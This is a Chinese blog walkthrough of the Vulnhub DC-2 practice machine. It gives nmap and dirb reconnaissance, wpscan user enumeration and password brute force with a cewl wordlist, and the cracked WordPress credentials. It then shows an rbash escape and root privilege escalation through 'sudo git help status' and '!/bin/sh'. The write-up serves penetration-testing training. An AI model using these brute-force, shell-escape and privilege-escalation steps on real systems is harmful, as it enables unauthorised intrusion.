kali dc-2通关报告

最新推荐文章于 2024-10-14 16:42:33 发布
最新推荐文章于 2024-10-14 16:42:33 发布
阅读量610 收藏 8
点赞数 12
文章标签: linux 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84076530/article/details/142584286
版权

信息收集:寻找靶机真实IP

nmap -sP 192.168.26.0/24

然后探索端口及服务

nmap -A -p- -v 192.168.26.130

这里出现了开放的80端口

找到虚拟机里的火狐浏览器输入虚拟机电脑的IP会访问失败,回到终端

输入vim /etc/hosts修改文件

再次到火狐搜索成功后出现这个界面

然后找到  flag  点开

意思就是暴力破解账号和密码

然后回到终端输入 dirb http://dc-2/  列出一个目录

找到网址后回到火狐搜索

会出现这个登录界面

然后使用wpscan --url http://dc-2

找到wordpress的版本4.7.10

再次尝试登录输入用户名和密码,提示用户名并不存在,可以使用用户名枚举

wpscan --url http://dc-2 --enumerate u 来尝试利用枚举爆破密码

分别出现了admin和jerry还有tom

根据flag1可以用暴力破解账号密码,可以使用两个代码分别是cewl http://dc-2/ -w dict.txt   或者 cewl http://dc-2/ > 1.txt

wpscan可以进行暴力破解

wpscan --url http://dc-2 --passwords dc2.txt

可以看到爆出了两个账号密码

回到登录页面登录账号 tom/parturient

在尝试  jerry/adipiscing  登录

发现 Jerry 的账号点开pages里面会有flag2然后点开

 回到终端 ssh tom@192.168.26.130 -p 7744 登录ssh

注意这里输入tom的密码并不显示

输入 ls 发现 flag3

接下来,尝试rbash绕过详情参考 https://xz.aliyun.com/t/7642

找到可以用的命令

echo $PATH

输入 cd /home/tom usr/bin发现进不去,在使用 ls /home/tom usr/bin

再使用echo

BASH_CMDS[a]=/bin/sh;a

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin

echo /*

输入tom的密码,输入su - jerry再输入jerry的密码再输入sudo -l

然后进行提权,查看一下可以使用的root权限命令

find / -user root -perm -4000 -print 2>/dev/null

jerry用户也可以直接sudo su

使用git命令进行提取

sudo git help status

输入!/bin/sh退出

然后输入 cd /root 和 cat final-flag.txt

2401_84076530
关注
Vulnhub靶机:DC-8渗透详细过程
IerkeU的博客
03-28 3061
DC-8 前情提要 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ DC-8是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个挑战试图证明在 Linux 上安装和配置的双重身份验证是否可以防止 Linux 服务器被攻击。这个挑战的最终目标是绕过双重身份验证,获取根并读取唯一标志。除非您尝试通过SSH登录,否则您可能甚至不知道安装和配置了双重身份验
kali dc-1 通关报告
2401_84076530的博客
09-22 618
发现他是www-data权限,进入home目录下cd /home,ls查看发现有flag4文件,用cd flag4切换到flag4路径下,然后ls查看,发现flag4.txt,用cat flag4.txt进入文件查看。nmap -A -p- -v 192.168.***.***(后两位是DC1的IP同样每人不相同)Set rhosts 192.168.***.***(注意是CD1的ip地址)在切换到root目录下ls查看文件,发现thefinalflag.txt文件。
靶机-DC-2通关全过程
认真走好每一小步
06-18 506
其中,"^USER^"和"^PASS^"将在攻击过程中分别被替换为不同的用户名和密码,"wp-submit=LogIn"表示登录按钮的名称,"testcookie=1"表示要求服务器设置一个测试Cookie,而"S=location"表示如果攻击成功,就重定向到/target/路径下的网页。当一个用户使用rbash作为其默认shell时,该用户将被限制只能执行一些基本的命令,例如cd、ls和echo等,并且不能使用绝大多数的shell功能,如变量赋值、重定向、管道和通配符扩展等。
DC-4靶机通关
qq_63831588的博客
07-23 1136
teehee提权,bp爆破
DC-2通关详解
li19711289532的博客
09-26 612
值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能该扫描器可以实现获取站点用户名,获取安装的所有插件、主题,以及存在漏洞的插件、主题,并提供漏洞信息。Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,你可以把字典用到类似John the Ripper这样的密码破解工具中。为了方便大家记录,或者为将来的研究提供参考,Cewl可以将打印出的字典存储为文件。
2024kali上打DC-1靶场
2301_80110280的博客
07-16 782
Current Setting是目前设置的内容 Required表示是否需要设置内容,yes为必须设置,no可以设置也可不设置 就上面来说RHOSTS需要set,但是没有内容 所以接着我们来设置一下RHOSTS内容(就是攻击目标IP地址,靶场地址)
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-2 通关详解 (附靶机搭建教程)
qq_51577576的博客
03-15 2372
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-2 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
DC-2 通关详解
2401_83566240的博客
09-26 883
值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能该扫描器可以实现获取站点用户名,获取安装的所有插件、主题,以及存在漏洞的插件、主题,并提供漏洞信息。Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,你可以把字典用到类似John the Ripper这样的密码破解工具中。为了方便大家记录,或者为将来的研究提供参考,Cewl可以将打印出的字典存储为文件。
DC-2详细通关实验报告
2301_78713407的博客
09-27 1252
DC-2和DC-1非常相似,DC-2是另一个专门建立的易受攻击的实验室,目的是要获得渗透测试领域的经验。点击去之后,我们可以看到flag2的提示信息,简单来说就是如果wordpress不可以的话就需要其他方法,我们之前发现有ssh,我们可以看看ssh.发现访问不了,而且发现我们输入的IP地址自动转化为了域名,dc-2这个域名解析失败了,我们需要更改hosts文件,添加一个IP的域名指向。cewl http://dc-2/ -w dict.txt 或者 cewl http://dc -2/ > 1.txt。
Dc-2通关教程
2402_84645634的博客
09-29 815
DC-2从环境搭建到通关的教程
vulnhub-DC系列通关DC3靶机渗透
qq_35258210的博客
02-15 589
声明:此文章仅供参考学习,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。 目录 明确目标 信息收集 whatweb指纹识别工具 dirb目录扫描工具 joomscan(joomla框架专门的漏洞扫描器) searchsploit Ndya搜索工具 渗透攻击 sqlmap使用 john密码爆破工具 后渗透 提权&flag ----nc瑞士军刀工具 靶机汇总:https://blog.csdn.net/qq_35258210/article/d
VulnHub-DC-1靶机渗透测试和相应的知识点总结
qq_45584159的博客
12-15 1443
文章目录前言一、探测目标主机的ip1.使用arp-scan -l 命令,来探测同一局域网内的存活主机。2.使用netdiscover -i eth0二、使用namp扫描目标主机的开放端口,并通过开放端口得到更多的信息三. .Metasploit漏洞利用msf的简单使用:术语:模块:基础指令:模块使用规则:msf中大多数命令:第一步.启动msf:第二步.搜索drupal可利用的漏洞第三步,采用最新的2018漏洞尝试攻击,配置参数第四步,反弹shell四. 进入数据库第一步.进入数据库 前言 这是我第一次使用
vulnhub-DC系列通关DC1靶机渗透
qq_35258210的博客
02-07 1699
目录 flag1 信息收集 漏洞利用 后渗透 flag2 flag3 flag4 最终flag 该流程图出于:https://blog.csdn.net/weixin_44288604/article/details/108027062 本次学习参考于b站千峰机构的网络安全视频:https://www.bilibili.com/video/BV1i7411G7vm?p=268 这张流程图做得很好借来用用。如有侵权请告知删除 flag1 首先我们在启动DC1靶机后进入到系统只显示
VnlnHub DC-6
weixin_45682839的博客
04-23 3007
VnlnHub DC-6通关攻略记录
Linux 命令:每日一学,一文说尽打包压缩工具实践
WeiyiGeek 唯一极客IT知识分享
10-12 777
[知识是人生的灯塔,只有不断学习,才能照亮前行的道路]文章目录:0x00 前言简述前面,我们介绍了Linux中文件查找find命令以及与之联用最勤的xargs命令,作者以一个个简单的实例给各位看友展示了在运维中两个命令的使用技巧,今天我们再来介绍一些打包、压缩解压等相关命令。在 Linux 系统中,我们经常需要使用到压缩和解压文件,使用压缩文件可以减少文件大小,从而减少存储空间,以及在网络传输...
Linux】解读信号的本质&相关函数及指令的介绍
YYDsis的博客
10-14 754
一.信号的本质与相关概念1.体现中断的例子:.系统定义的信号列表1.用kill -l命令可以察看系统定义的信号列表2.(ps&kill&raise&abort)进程指令&信号相关函数【总结】【1】ps指令【2】kill&raise函数介绍与演示【3】abort函数介绍与演示三.产生信号的四种方式1.通过终端按键产生信号(Core Dump)2.调用系统函数向进程发信号3.由软件条件产生信号4.硬件异常产生信号
Linux】ioctl分析
最新发布
目标:MVP
10-14 1086
一个字符设备驱动通常会实现常规的openreleaseread和write接口,但是如果需要扩展新的功能,通常以ioctl接口的方式实现。fill:#333;user spacevfsdriverioctl()ulocked_ioctl()或compat_ioctl()user spacevfsdriver。
Linux动静态库
2301_76197086的博客
10-13 1115
详解Linux系统中的动静态库生成和使用,以及可执行程序运行时与动态库进行动态链接的原理
Linux云计算 |【第五阶段】ARCHITECTURE-DAY1
小安的运维专栏
10-12 980
ELK分布式日志分析系统、Elasticsearch分布式集群搭建、Kibana搭建、使用kibana展示数据
kali simple-cdd
01-05
Kali simple-cdd 是一种定制 Kali Linux 安装光盘的工具。它可以帮助用户根据自己的需求和偏好创建一个特定的 Kali Linux 安装光盘。通过 simple-cdd,用户可以选择他们需要的软件包、工具和配置,然后生成一个定制...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值